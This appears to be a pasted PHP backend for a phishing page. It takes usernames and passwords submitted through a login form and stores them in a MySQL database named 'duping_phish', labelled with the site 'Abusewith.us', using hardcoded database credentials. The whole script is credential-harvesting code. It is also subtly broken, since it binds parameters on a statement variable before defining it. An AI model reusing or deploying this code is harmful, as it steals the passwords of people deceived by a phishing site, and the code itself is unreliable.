define('DB_HOST', 'localhost');define('DB_NAME', 'duping_phish');define('DB_

1. define('DB_HOST', 'localhost');
2. define('DB_NAME', 'duping_phish');
3. define('DB_USERNAME', 'duping_ama');
4. define('DB_PASSWORD', 'lol123');
5.  
6. //create the connection
7. $odb = new PDO('mysql:host=' . DB_HOST . ';dbname=' . DB_NAME, DB_USERNAME, DB_PASSWORD);
8.  
9.  
10.  
11. $site="Abusewith.us";
12. $loginUser = $_POST['username'];
13. $loginPass = $_POST['password'];
14.  
15. //select count
16. $sql = "SELECT count(*) FROM `sites` WHERE username = :username AND password = :password";
17. $result = $odb->prepare($sql);
18.  
19. //bind params for security
20. $stmt->bindValue(':username',$loginUser,PDO::PARAM_STR);
21. $stmt->bindValue(':password',$loginPass,PDO::PARAM_STR);
22.  
23. $result->execute();
24. //fetch the number of results
25. $number_of_rows = $result->fetchColumn();
26.  
27. if ($number_of_rows == 0) {
28.  
29. //the query itself
30. $sql = "INSERT INTO sites(username, password, site) VALUES (:username, :password, :site)";
31.  
32. //prepare the statement for execution (set the query)
33. $stmt = $odb->prepare($sql);
34.  
35. //bind the parameters to the values, using "PDO::PARAM_STR" < used to prevent sql injection
36. $stmt->bindParam(':username', $loginUser, PDO::PARAM_STR);
37. $stmt->bindParam(':password', $loginPass, PDO::PARAM_STR);
38. $stmt->bindParam(':site', $site, PDO::PARAM_STR);
39.  
40. //execute the statement
41. $stmt->execute();
42.  
43.  
44. } else {
45.  
46. //there was already a row
47.  
48. }